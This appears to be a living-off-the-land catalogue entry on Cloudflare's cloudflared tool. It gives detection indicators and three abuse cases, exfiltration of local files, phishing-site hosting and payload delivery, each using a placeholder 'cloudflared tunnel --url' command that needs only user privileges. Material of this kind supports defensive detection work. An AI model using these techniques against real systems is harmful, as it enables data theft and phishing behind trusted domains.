.. /Cloudflared
Star

Cloudflared is provided by CloudFlare which is a cyber security company. This tool works in a similar fashion to others and allows insiders as well as threat actors for data exfiltration.

Paths:

Downloaded version of cloudflared, which gets executed anywhere on the system.

Resources:

https://defr0ggy.github.io/research/Abusing-Cloudflared-A-Proxy-Service-To-Host-&-Share-Apps/

Acknowledgements:

Kamran Saifullah (@deFr0ggy)

Detections:

Domain: *.trycloudflare.com
Command: Execution of the binary and/or with arguments.

Exfiltration

This will generate tunnels link. However, a local server on the same port is required to exfiltrate the data.
```
cloudflared.exe tunnel --url <IP>:<PORT>
```
Use case
Exposing local file system over the internet.

Privileges required
User

Operating systems
Windows, Mac, Linux

Phishing

By hosting a local server running a Phishing Website it is possible to expose it via CloudFlare URLs/Domains.
```
cloudflared.exe tunnel --url <IP>:<PORT>
```
Use case
Hosting phishing sites locally and exposing them via CloudFlare URLs.

Privileges required
User

Operating systems
Windows, Mac, Linux

Download

By simply hosting malicious binaries/payloads, it is possible to expose them via CloudFlare domains.
```
cloudflared.exe tunnel --url <IP>:<PORT>
```
Use case
Hosting malicious binaies/payloads locally and exposing them via CloudFlare URLs.

Privileges required
User

Operating systems
Windows, Mac, Linux